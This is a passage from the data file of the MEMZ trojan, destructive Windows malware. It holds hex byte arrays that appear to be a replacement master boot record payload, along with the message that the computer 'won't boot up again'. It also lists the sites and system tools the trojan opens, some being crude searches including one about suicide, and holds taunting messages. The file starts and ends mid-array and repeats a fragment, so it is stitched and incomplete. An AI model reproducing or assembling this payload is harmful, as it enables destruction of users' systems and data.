0xE0, 0x18, 0x0D, 0x01, 0x04, 0x80, 0x60, 0x1A, 0xFD, 0x09, 0x03, 0x96,
0x2A, 0x1B, 0x30, 0x18, 0x80, 0x0E, 0x03, 0xD9, 0x87, 0x1B, 0xD0, 0x18,
0x33, 0x4A, 0x05, 0x04, 0x7D, 0x33, 0x14, 0x50, 0x19, 0x33, 0x9B, 0x04,
0x04, 0xCD, 0x29, 0x30, 0xA1, 0x0A, 0x0C, 0xD1, 0x1F, 0x05, 0x1F, 0x25,
0x1E, 0x89, 0x13, 0x2C, 0x60, 0x15, 0x05, 0x6C, 0x27, 0x08, 0x12, 0xFF,
0x30, 0x33, 0xFD, 0x07, 0xBE, 0xFF, 0x2D, 0x1A, 0xFF, 0x2E, 0x19, 0x93,
0x31, 0x36, 0x0B, 0x80, 0xF0, 0x31, 0x3C, 0xED, 0x0B, 0x19, 0x27, 0x1A,
0xE0, 0x19, 0x81, 0x60, 0x60, 0x1A, 0xFB, 0x0B, 0x0B, 0x66, 0x2A, 0x32,
0xA0, 0x18, 0x0B, 0xA8, 0x88, 0x33, 0x40, 0x1C, 0x0C, 0x4C, 0x34, 0x33,
0x90, 0x1D, 0x80, 0x33, 0x0C, 0x9E, 0x1F, 0x35, 0xE0, 0x13, 0x0C, 0xD0,
0x50, 0x24, 0x89, 0x1D, 0x0D, 0x3D, 0x1D, 0x0F, 0xD9, 0xFF, 0x06, 0xBC,
0xFF, 0x0F, 0x88, 0xFF, 0x10, 0x84, 0xFF, 0x26, 0x54, 0xCA, 0x21, 0xC0,
0xCA, 0x1A, 0xBA, 0x26, 0x22, 0xB0, 0x29, 0x1B, 0x09, 0x27, 0x2A, 0xD0,
0x18, 0x42, 0x4A, 0x06, 0x13, 0x7E, 0x82, 0x2B, 0x70, 0x18, 0x14, 0x18,
0x38, 0x2B, 0xC0, 0x19, 0x84, 0x09, 0x09, 0x09, 0x09, 0x39, 0x1C, 0x3E,
0x4F, 0x14, 0xBD, 0x33, 0x05, 0x50, 0x1C, 0x24, 0xA9, 0x15, 0x80, 0xF1,
0x15, 0x22, 0xFF, 0x16, 0x51, 0xFF, 0x17, 0x50, 0xFF, 0x18, 0x4D, 0xFF,
0x36, 0x7C, 0xD2, 0x41, 0x00, 0xFF, 0x41, 0xFF, 0xAD, 0x1B, 0x9C, 0x34,
0x42, 0xE0, 0x18, 0x80, 0x30, 0x1B, 0xE9, 0x37, 0x43, 0x30, 0x18, 0x84,
0x09, 0x70, 0x70, 0x09, 0x39, 0x43, 0x4D, 0x50, 0x1C, 0x8D, 0x33, 0x43,
0xD0, 0x1D, 0x43, 0xEE, 0x0C, 0x82, 0xF1, 0xF1, 0x1F, 0x24, 0xBA, 0x4F,
0x46, 0x55, 0xD1, 0x1E, 0x3B, 0xFF, 0x01, 0x5B, 0x37, 0x05, 0xAD, 0xFF,
0x16, 0x29, 0xFF, 0x4F, 0x30, 0x80, 0x19, 0xF0, 0xCA, 0x22, 0x8A, 0x26,
0x1A, 0xE0, 0x29, 0x22, 0xD9, 0x27, 0x3A, 0x70, 0x17, 0x23, 0x17, 0x89,
0x3B, 0x10, 0x20, 0x23, 0xC0, 0x30, 0x33, 0x90, 0x1F, 0x24, 0x0F, 0x81,
0x4B, 0x99, 0x1B, 0x4B, 0xBD, 0x04, 0x44, 0x01, 0x05, 0x40, 0x84, 0x06,
0x4B, 0xCC, 0x48, 0x2F, 0x50, 0xD0, 0x3F, 0xE2, 0x9D, 0x40, 0x81, 0x04,
0x2F, 0x01, 0xFF, 0x05, 0xAD, 0xFF, 0x06, 0xFA, 0xFF, 0x50, 0x80, 0xE9,
0x2A, 0x59, 0x27, 0x3A, 0x20, 0x26, 0x2A, 0xA6, 0x2A, 0x3A, 0x70, 0x23,
0x2A, 0xF3, 0x7D, 0x52, 0x80, 0x2C, 0x33, 0x6C, 0x3B, 0x80, 0x3F, 0x52,
0xE8, 0x10, 0x2B, 0xE8, 0x27, 0x53, 0x1F, 0x16, 0x80, 0xF9, 0x5B, 0x02,
0x04, 0x2C, 0x2A, 0x35, 0x53, 0x6F, 0x15, 0x80, 0xF1, 0x5B, 0x45, 0x05,
0x80, 0xF1, 0x2C, 0x7B, 0x31, 0x08, 0x4A, 0xFF, 0x57, 0x90, 0x97, 0x5C,
0xD1, 0x4F, 0x5D, 0x22, 0x4F, 0x87, 0x7E, 0x27, 0x12, 0x27, 0x4C, 0x46,
0xB8, 0x44, 0x5D, 0xC0, 0x05, 0x8E, 0x26, 0xB8, 0x24, 0x34, 0x24, 0xBF,
0x23, 0x34, 0x24, 0x00, 0x25, 0xB8, 0x44, 0x4C, 0x46, 0x5D, 0xC0, 0x08,
0x5D, 0xD4, 0x05, 0xA0, 0x24, 0x34, 0x24, 0x89, 0x23, 0xBF, 0x23, 0x89,
0x23, 0x34, 0x24, 0x4C, 0x46, 0x9D, 0x45, 0x7E, 0x27, 0x7E, 0x27, 0x70,
0x49, 0xF0, 0x27, 0x68, 0x28, 0x70, 0x29, 0x70, 0x69, 0x68, 0x48, 0xF0,
0x47, 0x5D, 0xFE, 0x06, 0x87, 0x68, 0x28, 0x7E, 0x27, 0x4C, 0x26, 0x9D,
0x25, 0x5E, 0x12, 0x04, 0x5E, 0x10, 0x04, 0x5E, 0x0E, 0x04, 0x85, 0x70,
0x29, 0x7E, 0x47, 0x4C, 0x46, 0x5E, 0x16, 0x0C, 0x83, 0xF0, 0x27, 0x7E,
0x27, 0x5E, 0x0A, 0x08, 0x81, 0xF0, 0x47, 0x5E, 0x0E, 0x08, 0x5E, 0x46,
0x04, 0x5E, 0x3C, 0x05, 0x84, 0x48, 0x70, 0x49, 0x68, 0x48, 0x5D, 0xF4,
0x66, 0x85, 0x70, 0x49, 0x99, 0x2C, 0x39, 0x2B, 0x5E, 0xC0, 0x06, 0x5E,
0xAA, 0x06, 0x83, 0x70, 0x29, 0x12, 0x27, 0x5D, 0xC8, 0x06, 0x81, 0x70,
0x49, 0x5E, 0xC6, 0x08, 0x81, 0x99, 0x2C, 0x5E, 0xD4, 0x04, 0x5E, 0xB6,
0x04, 0x87, 0x99, 0x2C, 0xFB, 0x2E, 0x24, 0x2E, 0x99, 0x2C, 0x5E, 0xC0,
0x0E, 0x5E, 0xCC, 0x08, 0x5F, 0x00, 0x04, 0x5E, 0xF6, 0x04, 0x83, 0x70,
0x29, 0x00, 0x2A, 0x5F, 0x0C, 0x06, 0x5E, 0xD2, 0x0C, 0x81, 0x00, 0x4A,
0x5E, 0xC0, 0x6C, 0xBC, 0x68, 0x48, 0x59, 0x6F, 0x75, 0x72, 0x20, 0x63,
0x6F, 0x6D, 0x70, 0x75, 0x74, 0x65, 0x72, 0x20, 0x68, 0x61, 0x73, 0x20,
0x62, 0x65, 0x65, 0x6E, 0x20, 0x74, 0x72, 0x61, 0x73, 0x68, 0x65, 0x64,
0x20, 0x62, 0x79, 0x20, 0x74, 0x68, 0x65, 0x20, 0x4D, 0x45, 0x4D, 0x5A,
0x20, 0x74, 0x72, 0x6F, 0x6A, 0x61, 0x6E, 0x2E, 0x20, 0x4E, 0x6F, 0x77,
0x20, 0x65, 0x6E, 0x6A, 0x6F, 0x5F, 0xBC, 0x06, 0x8A, 0x4E, 0x79, 0x61,
0x6E, 0x20, 0x43, 0x61, 0x74, 0x2E, 0x2E, 0x2E
};
const size_t code1_len = sizeof(code1);
const size_t code2_len = sizeof(code2);
const size_t msg_len = sizeof(msg);
#include "data.h"
#ifndef CLEAN
const unsigned char msg[] = "YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.\r\n\r\nYour computer won't boot up again,\r\nso use it as long as you can!\r\n\r\n:D\r\n\r\nTrying to kill MEMZ will cause your system to be\r\ndestroyed instantly, so don't try it :D";
#endif
const char *sites[] = {
"http://google.co.ck/search?q=best+way+to+kill+yourself",
"http://google.co.ck/search?q=how+2+remove+a+virus",
"http://google.co.ck/search?q=mcafee+vs+norton",
"http://google.co.ck/search?q=how+to+send+a+virus+to+my+friend",
"http://google.co.ck/search?q=minecraft+hax+download+no+virus",
"http://google.co.ck/search?q=how+to+get+money",
"http://google.co.ck/search?q=bonzi+buddy+download+free",
"http://google.co.ck/search?q=how+2+buy+weed",
"http://google.co.ck/search?q=how+to+code+a+virus+in+visual+basic",
"http://google.co.ck/search?q=what+happens+if+you+delete+system32",
"http://google.co.ck/search?q=g3t+r3kt",
"http://google.co.ck/search?q=batch+virus+download",
"http://google.co.ck/search?q=virus.exe",
"http://google.co.ck/search?q=internet+explorer+is+the+best+browser",
"http://google.co.ck/search?q=facebook+hacking+tool+free+download+no+virus+working+2016",
"http://google.co.ck/search?q=virus+builder+legit+free+download",
"http://google.co.ck/search?q=how+to+create+your+own+ransomware",
"http://google.co.ck/search?q=how+to+remove+memz+trojan+virus",
"http://google.co.ck/search?q=my+computer+is+doing+weird+things+wtf+is+happenin+plz+halp",
"http://google.co.ck/search?q=dank+memz",
"http://google.co.ck/search?q=how+to+download+memz",
"http://google.co.ck/search?q=half+life+3+release+date",
"http://google.co.ck/search?q=is+illuminati+real",
"http://google.co.ck/search?q=montage+parody+making+program+2016",
"http://google.co.ck/search?q=the+memz+are+real",
"http://google.co.ck/search?q=stanky+danky+maymays",
"http://google.co.ck/search?q=john+cena+midi+legit+not+converted",
"http://google.co.ck/search?q=vinesauce+meme+collection",
"http://google.co.ck/search?q=skrillex+scay+onster+an+nice+sprites+midi",
"http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b45",
"http://motherboard.vice.com/read/watch-this-malware-turn-a-computer-into-a-digital-hellscape",
"http://play.clubpenguin.com",
"http://pcoptimizerpro.com",
"http://softonic.com",
"calc",
"notepad",
"cmd",
"write",
"regedit",
"explorer",
"taskmgr",
"msconfig",
"mspaint",
"devmgmt.msc",
"control",
"mmc",
};
const size_t nSites = sizeof(sites) / sizeof(void *);
#ifndef CLEAN
const char *msgs[] = {
"YOU KILLED MY TROJAN!\r\nNow you are going to die.",
"REST IN PISS, FOREVER MISS.",
"I WARNED YOU...",
"HAHA N00B L2P G3T R3KT",
"You failed at your 1337 h4x0r skillz.",
"YOU TRIED SO HARD AND GOT SO FAR, BUT IN THE END, YOUR PC WAS STILL FUCKED!",
"HACKER!\r\nENJOY BAN!",
"GET BETTER HAX NEXT TIME xD",
"HAVE FUN TRYING TO RESTORE YOUR DATA :D",
"|\\/|3|\\/|2",
"BSOD INCOMING",
"VIRUS PRANK (GONE WRONG)",
"ENJOY THE NYAN CAT",
"Get dank antivirus m9!",
"You are an idiot!\r\nHA HA HA HA HA HA HA",
"#MakeMalwareGreatAgain",
"SOMEBODY ONCE TOLD ME THE MEMZ ARE GONNA ROLL ME",
"Why did you even tried to kill MEMZ?\r\nYour PC is fucked anyway.",
"SecureBoot sucks.",
"gr8 m8 i r8 8/8",
"Have you tried turning it off and on again?",
"<Insert Joel quote here>",
"Greetings to all GAiA members!",
"Well, hello there. I don't believe we've been properly introduced. I'm Bonzi!",
"'This is everything I want in my computer'\r\n - danooct1 2016",
"'Uh, Club Penguin. Time to get banned!'\r\n - danooct1 2016",
};
const size_t nMsgs = sizeof(msgs) / sizeof(void *);
#endif
const char *sounds[] = {
"SystemHand",
"SystemQuestion",
"SystemExclamation"
};
const size_t nSounds = sizeof(sounds) / sizeof(void *);
#ifndef CLEAN
// Split into 2 parts to save some space.
const unsigned char code1[] = {
0xBB, 0xE0, 0x07, 0x8E, 0xC3, 0x8E, 0xDB, 0xB8, 0x04, 0x02, 0xB9, 0x02,
0x00, 0xB6, 0x00, 0xBB, 0x00, 0x00, 0xCD, 0x13, 0x31, 0xC0, 0x89, 0xC3,
0x89, 0xC1, 0x89, 0xC2, 0xBE, 0x00, 0x00, 0xBF, 0x00, 0x40, 0xAC, 0x81,
0xFE, 0x9E, 0x07, 0x73, 0x35, 0x3C, 0x80, 0x73, 0x03, 0xE9, 0x10, 0x00,
0x24, 0x7F, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9, 0x80, 0xF9, 0xFF, 0x75,
0xF7, 0xE9, 0xE2, 0xFF, 0x88, 0xC4, 0xAC, 0x89, 0xC3, 0xAC, 0x89, 0xF2,
0x89, 0xDE, 0x81, 0xC6, 0x00, 0x40, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9,
0x80, 0xF9, 0x00, 0x75, 0xF7, 0x89, 0xD6, 0xE9, 0xC4, 0xFF, 0xB0, 0xB6,
0xE6, 0x43, 0xB8, 0x03, 0x10, 0xB3, 0x00, 0xCD, 0x10, 0xBF, 0x00, 0x00,
0xBA, 0xC0, 0x9D, 0xB9, 0x00, 0xB8, 0x8E, 0xC1, 0xB8, 0x00, 0x00, 0xB9,
0xD0, 0x07, 0xF3, 0xAB, 0xBE, 0x9C, 0x9F, 0xBF, 0x00, 0x00, 0xE4, 0x61,
0x0C, 0x03, 0xE6, 0x61, 0xB3, 0x01, 0x52, 0xB4, 0x86, 0xB9, 0x00, 0x00,
0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A, 0x81, 0xFE, 0xE8, 0x9F, 0x7D, 0x04,
0xAC, 0xB4, 0xF0, 0xAB, 0xFE, 0xCB, 0x80, 0xFB, 0x00, 0x75, 0xE3, 0x56,
0x89, 0xD6, 0xAD, 0x89, 0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0,
0xE6, 0x42, 0xC0, 0xED, 0x05, 0xC0, 0xE5, 0x02, 0x88, 0xEB, 0x89, 0xF2,
0x5E, 0x81, 0xFA, 0xF4, 0x9D, 0x75, 0xC3, 0xBE, 0x00, 0x40, 0xBF, 0x00,
0x00, 0xB8, 0xE0, 0x07, 0x8E, 0xD8, 0xB8, 0x00, 0xB8, 0x8E, 0xC0, 0xFE,
0xCB, 0xE9, 0x20, 0x00, 0xB0, 0xDC, 0xAA, 0xAC, 0xAA, 0x81, 0xFE, 0xC0,
0x9D, 0x74, 0x42, 0x81, 0xFF, 0xA0, 0x0F, 0x74, 0x03, 0xE9, 0xEC, 0xFF,
0x52, 0xB4, 0x86, 0xB9, 0x01, 0x00, 0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A,
0xBF, 0x00, 0x00, 0x81, 0xFA, 0x9C, 0x9F, 0x75, 0x03, 0xBA, 0xF4, 0x9D,
0xFE, 0xCB, 0x80, 0xFB, 0x00, 0x75, 0xCD, 0x56, 0x89, 0xD6, 0xAD, 0x89,
0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0, 0xE6, 0x42, 0xC0, 0xED,
0x05, 0x88, 0xEB, 0x89, 0xF2, 0x5E, 0xE9, 0xB3, 0xFF, 0xBE, 0x00, 0x40,
0xE9, 0xC1, 0xFF
};
const unsigned char code2[] = {
0x55, 0xAA, 0x83, 0x11, 0x11, 0x11, 0x11, 0x00, 0x00, 0x04, 0x00, 0x00,
0x08, 0x00, 0x00, 0x10, 0x00, 0x00, 0x20, 0x00, 0x35, 0x0B, 0x83, 0xF1,
0xF1, 0x11, 0xF1, 0x00, 0x00, 0x4B, 0x00, 0x96, 0x04, 0x80, 0xFF, 0x00,
0x4F, 0x4F, 0x00, 0x9F, 0x4F, 0x00, 0xEA, 0x53, 0x82, 0x1F, 0xF1, 0x1F,
0x01, 0x42, 0x4E, 0x00, 0x4E, 0x50, 0x02, 0x12, 0x1F, 0x83, 0x10, 0x10,
0x10, 0x10, 0x02, 0x50, 0x04, 0x02, 0x50, 0x08, 0x80, 0x10, 0x02, 0x31,
0x1F, 0x83, 0x14, 0x14, 0x14, 0x14, 0x02, 0x80, 0x04, 0x83, 0x44, 0x44,
0x44, 0x44, 0x02, 0x88, 0x04, 0x02, 0x80, 0x0E, 0x87, 0x40, 0x0E, 0xEE,
0xEE, 0xED, 0xED, 0xED, 0xED, 0x02, 0xA2, 0x04, 0x02, 0xA5, 0x05, 0x82,
0xEE, 0xEE, 0x0E, 0x02, 0x60, 0x1E, 0x02, 0x88, 0x08, 0x83, 0x46, 0x46,
0x46, 0x46, 0x02, 0xD8, 0x04, 0x02, 0xD0, 0x0E, 0x8C, 0x00, 0xEE, 0xED,
0xDD, 0xDC, 0xDD, 0xDD, 0xDD, 0xDD, 0xCD, 0xDD, 0xDD, 0xCD, 0x02, 0xF3,
0x04, 0x83, 0xDD, 0xED, 0xEE, 0x00, 0x02, 0xB3, 0x1D, 0x83, 0x66, 0x66,
0x66, 0x66, 0x03, 0x20, 0x04, 0x03, 0x20, 0x08, 0x03, 0x22, 0x0E, 0x81,
0x00, 0xEE, 0x02, 0xFB, 0x05, 0x03, 0x41, 0x04, 0x83, 0xD0, 0x07, 0x07,
0xD0, 0x02, 0xF9, 0x04, 0x84, 0xEE, 0x00, 0x10, 0x07, 0x07, 0x02, 0xB2,
0x1A, 0x83, 0x6E, 0x6E, 0x6E, 0x6E, 0x03, 0x70, 0x04, 0x83, 0xEE, 0xEE,
0xEE, 0xEE, 0x03, 0x78, 0x04, 0x03, 0x70, 0x08, 0x85, 0x00, 0x07, 0x07,
0x00, 0xE0, 0xEE, 0x03, 0x3E, 0x08, 0x8F, 0xCD, 0xDD, 0xDD, 0x00, 0x77,
0x77, 0x77, 0x07, 0xD0, 0xD0, 0xD0, 0xE0, 0x07, 0x77, 0x77, 0x77, 0x03,
0x02, 0x1A, 0x03, 0x78, 0x08, 0x83, 0xEA, 0xEA, 0xEA, 0xEA, 0x03, 0xC8,
0x04, 0x03, 0xC0, 0x08, 0x85, 0x0A, 0x00, 0x70, 0x77, 0x07, 0x00, 0x03,
0x8E, 0x05, 0x02, 0xFA, 0x04, 0x81, 0xDC, 0xD0, 0x03, 0xA2, 0x04, 0x80,
0x77, 0x03, 0xEA, 0x04, 0x03, 0xEE, 0x04, 0x03, 0x55, 0x1A, 0x83, 0xAA,
0xAA, 0xAA, 0xAA, 0x04, 0x10, 0x04, 0x04, 0x10, 0x08, 0x04, 0x16, 0x0A,
0x85, 0x0A, 0x00, 0x70, 0x70, 0x00, 0xEE, 0x02, 0xF9, 0x07, 0x03, 0x98,
0x05, 0x80, 0xF0, 0x04, 0x38, 0x04, 0x80, 0x70, 0x04, 0x3B, 0x05, 0x03,
0xA6, 0x19, 0x83, 0xA3, 0xA3, 0xA3, 0xA3, 0x04, 0x60, 0x04, 0x83, 0x33,
0x33, 0x33, 0x33, 0x04, 0x68, 0x04, 0x04, 0x60, 0x0D, 0x83, 0x03, 0x00,
0xEE, 0xDE, 0x02, 0xF1, 0x04, 0x03, 0x96, 0x07, 0x81, 0x77, 0x70, 0x04,
0x3F, 0x04, 0x04, 0x8C, 0x04, 0x04, 0x46, 0x1A, 0x04, 0x68, 0x08, 0x87,
0x39, 0x39, 0x39, 0x39, 0xF9, 0x39, 0x39, 0x39, 0x04, 0xB0, 0x0C, 0x9A,
0x39, 0x30, 0x00, 0xE0, 0xEE, 0xEE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE,
0xDE, 0x0E, 0x70, 0x77, 0x77, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07,
0x77, 0x70, 0x01, 0x03, 0xA7, 0x19, 0x83, 0x99, 0x99, 0x99, 0x99, 0x05,
0x00, 0x04, 0x81, 0x99, 0x9F, 0x05, 0x04, 0x06, 0x05, 0x00, 0x09, 0x88,
0x99, 0x99, 0x99, 0x00, 0x77, 0x77, 0x70, 0x00, 0x01, 0x03, 0x88, 0x04,
0x83, 0x01, 0x01, 0x01, 0x01, 0x05, 0x21, 0x06, 0x05, 0x2B, 0x05, 0x03,
0x05, 0x1B, 0x83, 0x91, 0x91, 0x91, 0x91, 0x05, 0x50, 0x04, 0x05, 0x48,
0x10, 0x05, 0x5C, 0x04, 0x05, 0x27, 0x04, 0x05, 0x6A, 0x05, 0x05, 0x59,
0x07, 0x05, 0x6D, 0x07, 0x01, 0xB8, 0x98, 0x00, 0x9F, 0xF1, 0x06, 0x99,
0x73, 0x05, 0xAC, 0x93, 0x07, 0x7F, 0x06, 0x07, 0x7F, 0x4B, 0x82, 0xF1,
0x11, 0x1F, 0x05, 0xAB, 0xFF, 0x08, 0xAA, 0xBB, 0x02, 0x50, 0xF9, 0x03,
0x48, 0x05, 0x03, 0x4E, 0x05, 0x80, 0x11, 0x03, 0x53, 0x1C, 0x03, 0x70,
0x18, 0x84, 0xEE, 0xE0, 0xE0, 0xEE, 0xEE, 0x03, 0x8D, 0x0C, 0x03, 0x98,
0x08, 0x81, 0xE0, 0x00, 0x03, 0xA2, 0x1D, 0x03, 0xC0, 0x18, 0x04, 0x44,
0x04, 0x81, 0xE0, 0xE0, 0x03, 0xDE, 0x0A, 0x80, 0xDD, 0x03, 0xE8, 0x27,
0x04, 0x11, 0x1A, 0x83, 0x70, 0x70, 0x77, 0x77, 0x04, 0x2E, 0x0A, 0x04,
0x37, 0x28, 0x04, 0x60, 0x1C, 0x80, 0x03, 0x04, 0x7D, 0x0B, 0x04, 0x87,
0x28, 0x04, 0xC0, 0x0D, 0x04, 0xBD, 0x10, 0x80, 0x39, 0x04, 0xCE, 0x0B,
0x04, 0xD8, 0x27, 0x05, 0x10, 0x0C, 0x0C, 0xD0, 0x0C, 0x05, 0x17, 0x08,
0x05, 0x20, 0x0B, 0x05, 0x2A, 0x25, 0x05, 0x62, 0x06, 0x80, 0xF1, 0x05,
0x57, 0x15, 0x05, 0x71, 0x07, 0x05, 0x72, 0x11, 0x05, 0x82, 0x2A, 0x05,
0xAD, 0xFF, 0x06, 0xB1, 0xFF, 0x07, 0xB5, 0xAE, 0x81, 0x11, 0x11, 0x01,
0x92, 0x4F, 0x00, 0xDC, 0xB5, 0x0E, 0xFC, 0x9C, 0x00, 0x4B, 0x54, 0x0A,
0x59, 0x15, 0x12, 0x25, 0x0A, 0x84, 0x10, 0x0E, 0x0E, 0x0E, 0x0E, 0x12,
0x40, 0x04, 0x12, 0x40, 0x08, 0x0A, 0x81, 0x1F, 0x80, 0x11, 0x0A, 0xA9,
0x15, 0x12, 0x75, 0x09, 0x83, 0x00, 0xEE, 0xEE, 0xED, 0x0C, 0x04, 0x05,
0x80, 0xDC, 0x0B, 0xB5, 0x04, 0x0A, 0xCD, 0x05, 0x0A, 0xD1, 0x41, 0x0C,
0x01, 0x08, 0x82, 0xDD, 0xD0, 0xD0, 0x12, 0x99, 0x04, 0x12, 0xA1, 0x04,
0x0A, 0x2F, 0x1B, 0x0B, 0x49, 0x10, 0x13, 0x10, 0x0E, 0x0B, 0x5E, 0x08,
0x12, 0x9A, 0x04, 0x80, 0x00, 0x0B, 0x6C, 0x04, 0x03, 0x4F, 0x06, 0x0B,
0x75, 0x1B, 0x0B, 0x99, 0x0F, 0x0B, 0x98, 0x0F, 0x13, 0x2E, 0x05, 0x12,
0x9A, 0x05, 0x0C, 0x57, 0x07, 0x0C, 0xB1, 0x05, 0x0B, 0x74, 0x1C, 0x04,
0x10, 0x1A, 0x82, 0xA0, 0xA0, 0xA0, 0x03, 0xDD, 0x04, 0x13, 0x83, 0x06,
0x80, 0xCD, 0x13, 0x89, 0x05, 0x80, 0x7F, 0x0C, 0x64, 0x04, 0x13, 0xDB,
0x06, 0x0C, 0x68, 0x1F, 0x0C, 0x30, 0x11, 0x0B, 0x72, 0x04, 0x04, 0x2C,
0x05, 0x13, 0x32, 0x0B, 0x80, 0x77, 0x13, 0x91, 0x05, 0x80, 0x07, 0x14,
0x2C, 0x05, 0x13, 0xE8, 0x18, 0x0C, 0x89, 0x15, 0x14, 0x55, 0x04, 0x88,
0x03, 0x03, 0x03, 0x03, 0x33, 0x00, 0xEE, 0xEE, 0xDE, 0x12, 0xE2, 0x07,
0x80, 0x0D, 0x0C, 0x64, 0x05, 0x81, 0x70, 0x70, 0x04, 0x2B, 0x04, 0x80,
0x77, 0x0C, 0xB5, 0x1A, 0x05, 0x0E, 0x0E, 0x0C, 0xDD, 0x11, 0x84, 0x07,
0xE0, 0xE0, 0xE0, 0xE0, 0x14, 0xC0, 0x04, 0x87, 0xE0, 0xE0, 0xE0, 0x00,
0x70, 0x70, 0x70, 0x70, 0x14, 0xCC, 0x04, 0x80, 0x70, 0x04, 0xE5, 0x1B,
0x81, 0xF1, 0x1F, 0x11, 0xCF, 0x05, 0x05, 0x50, 0x17, 0x80, 0x00, 0x14,
0xD4, 0x04, 0x82, 0x01, 0x70, 0x70, 0x14, 0x38, 0x07, 0x15, 0x13, 0x05,
0x15, 0x13, 0x0A, 0x05, 0xAD, 0xFF, 0x0F, 0xE2, 0xE7, 0x0F, 0xD9, 0x93,
0x05, 0xAC, 0xFF, 0x16, 0x23, 0xA0, 0x17, 0xA5, 0x04, 0x08, 0x18, 0x4D,
0x08, 0x14, 0x5B, 0x12, 0x20, 0xFF, 0x13, 0x1F, 0xAD, 0x81, 0x07, 0x07,
0x13, 0xCE, 0x4A, 0x83, 0xA0, 0x07, 0x77, 0x70, 0x14, 0x1C, 0x4C, 0x84,
0x03, 0x70, 0x70, 0x03, 0x33, 0x14, 0x6D, 0x34, 0x14, 0xA2, 0x1C, 0x81,
0x90, 0x07, 0x14, 0xBF, 0x31, 0x05, 0x49, 0x1D, 0x15, 0x0E, 0xFF, 0x18,
0x97, 0xFF, 0x08, 0x15, 0x94, 0x14, 0xF0, 0x07, 0x05, 0xAD, 0xFF, 0x16,
0x2D, 0xFF, 0x20, 0x84, 0x4C, 0x0A, 0x50, 0x1E, 0x81, 0x44, 0x40, 0x1A,
0x10, 0x30, 0x0A, 0xA0, 0x20, 0x1A, 0x60, 0x5A, 0x81, 0xD0, 0xD0, 0x22,
0x38, 0x05, 0x0B, 0x21, 0x04, 0x21, 0xF1, 0x1B, 0x0B, 0x40, 0x19, 0x1B,
0x49, 0x0A, 0x22, 0x34, 0x06, 0x1B, 0x0A, 0x07, 0x81, 0xDD, 0xEE, 0x14,
0x18, 0x04, 0x03, 0xA6, 0x31, 0x81, 0xE0, 0x07, 0x03, 0x89, 0x04, 0x0B,
0xAD, 0x06, 0x1B, 0xA1, 0x06, 0x1B, 0x5A, 0x26, 0x1B, 0x7F, 0x18, 0x81,
0x0A, 0x0A, 0x1C, 0xA2, 0x04, 0x1B, 0x9D, 0x0B, 0x1B, 0xA9, 0x27, 0x0C,
0x2F, 0x21, 0x22, 0xD1, 0x0B, 0x1B, 0xFC, 0x24, 0x0C, 0x7F, 0x1E, 0x80,
0x30, 0x1C, 0x3E, 0x0A, 0x1C, 0x49, 0x27, 0x1C, 0x6F, 0x1C, 0x80, 0x90,
0x23, 0x18, 0x06, 0x1C, 0x93, 0x2E, 0x05, 0x50, 0x1B, 0x15, 0x0E, 0xFF,
0x10, 0xD9, 0xF8, 0x80, 0xF1, 0x26, 0x50, 0x4D, 0x00, 0x9E, 0x47, 0x82,
0xF1, 0xF1, 0x1F, 0x26, 0xA2, 0x4E, 0x05, 0xAB, 0xFF, 0x06, 0xE0, 0xFF,
0x21, 0xB6, 0xD3, 0x03, 0x49, 0x05, 0x22, 0x8E, 0x05, 0x03, 0x53, 0x35,
0x0B, 0x58, 0x0E, 0x23, 0xC5, 0x08, 0x03, 0x9E, 0x3A, 0x0B, 0xA8, 0x0B,
0x2A, 0x0A, 0x05, 0x03, 0xE8, 0x41, 0x0B, 0xF9, 0x08, 0x23, 0x71, 0x0B,
0x04, 0x3C, 0x40, 0x23, 0xBC, 0x10, 0x04, 0x8C, 0x30, 0x23, 0xFC, 0x1C,
0x24, 0x17, 0x05, 0x0C, 0xAE, 0x22, 0x80, 0x1F, 0x24, 0x40, 0x1D, 0x80,
0x77, 0x24, 0x5E, 0x0C, 0x86, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x0C, 0xF4, 0x04, 0x29, 0x0C, 0x1B, 0x24, 0x90, 0x20, 0x2C, 0x7B, 0x05,
0x2C, 0x6B, 0x05, 0x24, 0xAB, 0x0F, 0x00, 0x38, 0xFF, 0x2D, 0x19, 0x7F,
0x2C, 0xFF, 0x4E, 0x27, 0x37, 0x98, 0x26, 0x9D, 0x9A, 0x05, 0xAD, 0xFF,
0x25, 0xF5, 0x5A, 0x1F, 0x6F, 0x40, 0x0A, 0x20, 0x30, 0x19, 0xF0, 0x1E,
0x80, 0x10, 0x0A, 0x6F, 0x31, 0x1A, 0x40, 0x20, 0x02, 0xF0, 0x80, 0x1A,
0xE0, 0x18, 0x0D, 0x01, 0x04, 0x80, 0x60, 0x1A, 0xFD, 0x09, 0x03, 0x96,
0x2A, 0x1B, 0x30, 0x18, 0x80, 0x0E, 0x03, 0xD9, 0x87, 0x1B, 0xD0, 0x18,
0x33, 0x4A, 0x05, 0x04, 0x7D, 0x33, 0x14, 0x50, 0x19, 0x33, 0x9B, 0x04,
0x04, 0xCD, 0x29, 0x30, 0xA1, 0x0A, 0x0C, 0xD1, 0x1F, 0x05, 0x1F, 0x25,
0x1E, 0x89, 0x13, 0x2C, 0x60, 0x15, 0x05, 0x6C, 0x27, 0x08, 0x12, 0xFF,
0x30, 0x33, 0xFD, 0x07, 0xBE, 0xFF, 0x2D, 0x1A, 0xFF, 0x2E, 0x19, 0x93,
0x31, 0x36, 0x0B, 0x80, 0xF0, 0x31, 0x3C, 0xED, 0x0B, 0x19, 0x27, 0x1A,
0xE0, 0x19, 0x81, 0x60, 0x60, 0x1A, 0xFB, 0x0B, 0x0B, 0x66, 0x2A, 0x32,
0xA0, 0x18, 0x0B, 0xA8, 0x88, 0x33, 0x40, 0x1C, 0x0C, 0x4C, 0x34, 0x33,
0x90, 0x1D, 0x80, 0x33, 0x0C, 0x9E, 0x1F, 0x35, 0xE0, 0x13, 0x0C, 0xD0,
